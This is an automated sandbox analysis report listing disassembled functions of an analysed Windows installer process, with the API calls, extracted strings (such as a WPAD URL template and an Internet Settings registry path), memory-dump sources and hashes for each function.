                                                                                                                                                                      • Instruction Fuzzy Hash: 430186B2200601AFF7211F79DC84E577EE9EB443A4B010D3DF2D6D6060D372BD659A20
                                                                                                                                                                      Function 001E49FC Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __lock.LIBCMT ref: 001E4A1A
                                                                                                                                                                        • Part of subcall function 001F339F: __mtinitlocknum.LIBCMT ref: 001F33B5
                                                                                                                                                                        • Part of subcall function 001F339F: __amsg_exit.LIBCMT ref: 001F33C1
                                                                                                                                                                        • Part of subcall function 001F339F: EnterCriticalSection.KERNEL32(?,?,?,001F4EDB,0000000D,0023EFE8,00000008,001EEA68,?,00000000), ref: 001F33C9
                                                                                                                                                                      • ___sbh_find_block.LIBCMT ref: 001E4A25
                                                                                                                                                                      • ___sbh_free_block.LIBCMT ref: 001E4A34
                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,?,0023E890,0000000C,001F4E21,00000000,?,001F05A7,?,00000001,?,?,001F3329,00000018,0023EF60,0000000C), ref: 001E4A64
                                                                                                                                                                      • GetLastError.KERNEL32(?,001F05A7,?,00000001,?,?,001F3329,00000018,0023EF60,0000000C,001F33BA,?,?,?,001F4EDB,0000000D), ref: 001E4A75
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2714421763-0
                                                                                                                                                                      • Opcode ID: c6a07682b862d6847562d4e9e0f1b6a5ea2d79049a9d56794764bbe323e178c2
                                                                                                                                                                      • Instruction ID: dd1324e46cac8cb5174242f5410179022e48016e81f7b7153baf902a881ce1b1
                                                                                                                                                                      • Opcode Fuzzy Hash: c6a07682b862d6847562d4e9e0f1b6a5ea2d79049a9d56794764bbe323e178c2
                                                                                                                                                                      • Instruction Fuzzy Hash: 5E016231D41A85ABDF24ABB2AC0EB5D7BA4AF61731F114528F515A70D1DB3889408A98
                                                                                                                                                                      Function 001B5F4D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 158COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3_
                                                                                                                                                                      • String ID: A:\
                                                                                                                                                                      • API String ID: 2427045233-3379428675
                                                                                                                                                                      • Opcode ID: 099052611ce37ec785fe031cb45279aa68862cca6b778d16bb162a9c4f08cdaa
                                                                                                                                                                      • Instruction ID: 0d9bedab6c9fd8d76b46607f69af270e32261a37e0ea922e6afa2d76c5847c74
                                                                                                                                                                      • Opcode Fuzzy Hash: 099052611ce37ec785fe031cb45279aa68862cca6b778d16bb162a9c4f08cdaa
                                                                                                                                                                      • Instruction Fuzzy Hash: 9A411938A00512DADF39BB1AC85ABFDB6A2EF74310F51402DF942D7195DB288D82CB51
                                                                                                                                                                      Function 001D6894 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3__memcmp_memset
                                                                                                                                                                      • String ID: [360signdata]sign=
                                                                                                                                                                      • API String ID: 1379577869-1737267629
                                                                                                                                                                      • Opcode ID: 3207b167ca5e88de9c1ef27de77977c3529cbd68bf79a95a4d15ddba2e47a480
                                                                                                                                                                      • Instruction ID: 47500fd7a01d6eddccc6ac7bd60477defb2d73bfb998051e945f500edcf216b1
                                                                                                                                                                      • Opcode Fuzzy Hash: 3207b167ca5e88de9c1ef27de77977c3529cbd68bf79a95a4d15ddba2e47a480
                                                                                                                                                                      • Instruction Fuzzy Hash: 104192B1D046189BCB24EB64CC51AEE73B8AF24315F5406AAE549E32C1E774AE848E50
                                                                                                                                                                      Function 00198544 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 0019854B
                                                                                                                                                                        • Part of subcall function 001E5546: _malloc.LIBCMT ref: 001E5560
                                                                                                                                                                        • Part of subcall function 0017A8EB: _wcsnlen.LIBCMT ref: 0017A91D
                                                                                                                                                                        • Part of subcall function 001CE037: _memset.LIBCMT ref: 001CE069
                                                                                                                                                                        • Part of subcall function 001CE037: GetTempPathW.KERNEL32(00000104,?,0024CDA4,?,?), ref: 001CE07D
                                                                                                                                                                        • Part of subcall function 001CE037: _memset.LIBCMT ref: 001CE08D
                                                                                                                                                                        • Part of subcall function 001CE037: GetTempFileNameW.KERNEL32(?,001985B6,00000000,?,?,?,?,?,?,?), ref: 001CE0A6
                                                                                                                                                                        • Part of subcall function 001CE037: DeleteFileW.KERNEL32(?,?,?,?,?,?,?), ref: 001CE0B3
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 001985F7
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileTemp_memset$CountDeleteH_prolog3NamePathTick_malloc_wcsnlen
                                                                                                                                                                      • String ID: !@tmpini%^&$?rd=%d
                                                                                                                                                                      • API String ID: 431327915-4013382025
                                                                                                                                                                      • Opcode ID: 2e6743f4b829abc14e4c9f93aafd35d1277e2c22b1860077d5b2704c7bee497a
                                                                                                                                                                      • Instruction ID: aedc9f09cfe4b28c8e6b9fbe1ca7c500adac3ceba0a49d140f14dc30f95b2d40
                                                                                                                                                                      • Opcode Fuzzy Hash: 2e6743f4b829abc14e4c9f93aafd35d1277e2c22b1860077d5b2704c7bee497a
                                                                                                                                                                      • Instruction Fuzzy Hash: FA21BA71A042089ADB14FBE4DC96BFFB3A9AF64310F000518F21AA71C2DF70A9548765
                                                                                                                                                                      Function 001A30A3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001A30AA
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,0000019F,00000078,00000006,0000012A,PNG,00000018), ref: 001A30E5
                                                                                                                                                                        • Part of subcall function 0018E185: GetDC.USER32(?), ref: 0018E193
                                                                                                                                                                        • Part of subcall function 001E5546: _malloc.LIBCMT ref: 001E5560
                                                                                                                                                                        • Part of subcall function 00197323: CreateCompatibleDC.GDI32(?), ref: 00197347
                                                                                                                                                                        • Part of subcall function 00197323: SelectObject.GDI32(?,?), ref: 0019736E
                                                                                                                                                                        • Part of subcall function 00197323: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00197387
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CompatibleCreateH_prolog3ObjectSelectViewportWindow_malloc
                                                                                                                                                                      • String ID: PNG$x
                                                                                                                                                                      • API String ID: 2666613662-1595511861
                                                                                                                                                                      • Opcode ID: 4bf33a7be8ba705eb1c8d98c4a7a230633ce022df3915faafcb4f74affe96361
                                                                                                                                                                      • Instruction ID: a86643b9bd2d77c1acc85b7f98a6ecd6e9e18db7a520fcff87ba2e335ab1980f
                                                                                                                                                                      • Opcode Fuzzy Hash: 4bf33a7be8ba705eb1c8d98c4a7a230633ce022df3915faafcb4f74affe96361
                                                                                                                                                                      • Instruction Fuzzy Hash: 3711C170A00608AFDF04EFA4C88AABEB6F6FF55314F90406CF006A71D1DB75AE059B11
                                                                                                                                                                      Function 5F4F55B1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 5F4F4E4F: __EH_prolog3_GS.LIBCMT ref: 5F4F4E56
                                                                                                                                                                        • Part of subcall function 5F513F0C: _memset.LIBCMT ref: 5F513F3E
                                                                                                                                                                        • Part of subcall function 5F513F0C: wvnsprintfW.SHLWAPI(?,000003FF,?,?), ref: 5F513F59
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 5F4F55EC
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 5F4F55FC
                                                                                                                                                                      Strings
                                                                                                                                                                      • _IsHaveEntClient:%d, xrefs: 5F4F55BD
                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 5F4F5606
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateEvent$H_prolog3__memsetwvnsprintf
                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Internet Settings$_IsHaveEntClient:%d
                                                                                                                                                                      • API String ID: 1875430345-55523219
                                                                                                                                                                      • Opcode ID: 8a1e7bd9fcd246d820a1973d6f7d73026419fce6c535eed3656b075ee9ee376a
                                                                                                                                                                      • Instruction ID: a31d84c14e4c1f9fe730eb51f20af833d2977c9626bde48cd3a0af39e49d3c4c
                                                                                                                                                                      • Opcode Fuzzy Hash: 8a1e7bd9fcd246d820a1973d6f7d73026419fce6c535eed3656b075ee9ee376a
                                                                                                                                                                      • Instruction Fuzzy Hash: E4F03CB14027486BD2259BB68C44CE7BBECEFC6B65751092EF2AA56200DA316440C6A5
                                                                                                                                                                      Function 5F51C5DF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F51C5EA
                                                                                                                                                                      • SendMessageW.USER32(5F5BC3F0,?,?,?), ref: 5F51C5FC
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F51C604
                                                                                                                                                                        • Part of subcall function 5F513FED: _memset.LIBCMT ref: 5F514020
                                                                                                                                                                        • Part of subcall function 5F513FED: wvnsprintfW.SHLWAPI(?,000003FF,?,00007148), ref: 5F51403B
                                                                                                                                                                      Strings
                                                                                                                                                                      • [CAsyncNetwork::SyncSendMsg] msg: %d cost: %d s, xrefs: 5F51C61D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountTick$MessageSend_memsetwvnsprintf
                                                                                                                                                                      • String ID: [CAsyncNetwork::SyncSendMsg] msg: %d cost: %d s
                                                                                                                                                                      • API String ID: 3817034548-3777656696
                                                                                                                                                                      • Opcode ID: e5fe9f97f2641d62d47b9b462adf060a0a99798c08f8b3f3bc712732eb494535
                                                                                                                                                                      • Instruction ID: ddda796f43729d6cbe721796fe3a0838a9ef3d4d20cdcd9dc67f3b4422427006
                                                                                                                                                                      • Opcode Fuzzy Hash: e5fe9f97f2641d62d47b9b462adf060a0a99798c08f8b3f3bc712732eb494535
                                                                                                                                                                      • Instruction Fuzzy Hash: F0F027779002115BE7019AB88C0CCAEBEE6DFC8120B01483BF548C3161C972CC6496A1
                                                                                                                                                                      Function 5F4F2447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F4F244B
                                                                                                                                                                        • Part of subcall function 5F4F2364: _malloc.LIBCMT ref: 5F4F2387
                                                                                                                                                                        • Part of subcall function 5F4F2364: GetNetworkParams.IPHLPAPI(00000000,?), ref: 5F4F239D
                                                                                                                                                                        • Part of subcall function 5F4F2364: _malloc.LIBCMT ref: 5F4F23B3
                                                                                                                                                                        • Part of subcall function 5F4F2364: GetNetworkParams.IPHLPAPI(00000000,?), ref: 5F4F23C8
                                                                                                                                                                        • Part of subcall function 5F4F2364: _memset.LIBCMT ref: 5F4F23EF
                                                                                                                                                                        • Part of subcall function 5F4F2364: __snwprintf.LIBCMT ref: 5F4F2416
                                                                                                                                                                      • __snwprintf.LIBCMT ref: 5F4F2475
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: NetworkParams__snwprintf_malloc$CountTick_memset
                                                                                                                                                                      • String ID: http://%s/wpad.dat$wpad
                                                                                                                                                                      • API String ID: 140397255-1948369278
                                                                                                                                                                      • Opcode ID: cd4837cb4c79a0855b33a976ce35637c53343cb535a07b931fb9915a5bd2957b
                                                                                                                                                                      • Instruction ID: 31b3fe5bb63dd3a2c2f4511a188387ca3ddf837ed637e6998509205281808129
                                                                                                                                                                      • Opcode Fuzzy Hash: cd4837cb4c79a0855b33a976ce35637c53343cb535a07b931fb9915a5bd2957b
                                                                                                                                                                      • Instruction Fuzzy Hash: 5CE0C2B210931067C310BA665C08D6FBE99EFD62B0F09082BF85983312E6609556C1E1
                                                                                                                                                                      Function 5F51E488 Relevance: 6.2, APIs: 4, Instructions: 238COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 5F51E70D
                                                                                                                                                                        • Part of subcall function 5F51CDE8: PostQuitMessage.USER32(00000000), ref: 5F51CECB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePostProcQuitWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3873111417-0
                                                                                                                                                                      • Opcode ID: 5912346e96e22af19d9b709c30609cff189344cb438de4a5bb8e267372ebeee2
                                                                                                                                                                      • Instruction ID: f1da6df9ebcc23b361d5c13549b1526bd21f5252397a33b7784eecd043027460
                                                                                                                                                                      • Opcode Fuzzy Hash: 5912346e96e22af19d9b709c30609cff189344cb438de4a5bb8e267372ebeee2
                                                                                                                                                                      • Instruction Fuzzy Hash: 3E81A7B46012059BEB25DFA4C994EEFB7F5AF88310F10093AEA96D7241E734B941C7A1
                                                                                                                                                                      Function 001650A0 Relevance: 6.2, APIs: 4, Instructions: 191fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileSizeEx.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,0016611A,?,00000000,?), ref: 001650BC
                                                                                                                                                                      • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,0016611A,?,00000000,?), ref: 0016515B
                                                                                                                                                                      • ReadFile.KERNEL32(?,?,00008000,?,00000000,?,?,?,?,?,0016611A,?,00000000,?), ref: 00165177
                                                                                                                                                                      • _memset.LIBCMT ref: 0016521E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$PointerReadSize_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1834740430-0
                                                                                                                                                                      • Opcode ID: 1fc16e1938b7e72bcf93b712f22c99ba8d560dbc645ae1c2caff58f02523a560
                                                                                                                                                                      • Instruction ID: 05a0eec18aa1ceb18bff27e9a4b3e40d55873fe09d45d23e0e1f3fd1ea06abbc
                                                                                                                                                                      • Opcode Fuzzy Hash: 1fc16e1938b7e72bcf93b712f22c99ba8d560dbc645ae1c2caff58f02523a560
                                                                                                                                                                      • Instruction Fuzzy Hash: 9751CB71A087009FE314DF69DC80B2BB7E5EF88714F54892DF889D7240EB34E9648B92
                                                                                                                                                                      Function 00184994 Relevance: 6.2, APIs: 4, Instructions: 158filethreadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentDeleteFileH_prolog3Thread__wcsicoll
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3249433508-0
                                                                                                                                                                      • Opcode ID: 3e25b781f450a4d977d1a5fc7e21167919bf465af6cf00ee973a09c7640ed862
                                                                                                                                                                      • Instruction ID: 0bb021375f769204a71890e13dcf3efc4d91ff014dd04537bbea853e6837093d
                                                                                                                                                                      • Opcode Fuzzy Hash: 3e25b781f450a4d977d1a5fc7e21167919bf465af6cf00ee973a09c7640ed862
                                                                                                                                                                      • Instruction Fuzzy Hash: AF519B3181064A9BDF19BFA0D886BEEB7B1FF24304F10442DE886A3192DF709A85CB51
                                                                                                                                                                      Function 001CE697 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001CE69E
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(00000000,00000000,0022E544,0000005C,00000008,001CE838,?,?,0000002C), ref: 001CE75E
                                                                                                                                                                      • SHCreateDirectoryExW.SHELL32(00000000,00000000,00000000,?,?,0000002C), ref: 001CE76B
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,0000002C), ref: 001CE7B5
                                                                                                                                                                        • Part of subcall function 0016DFB0: __CxxThrowException@8.LIBCMT ref: 0016DFC2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
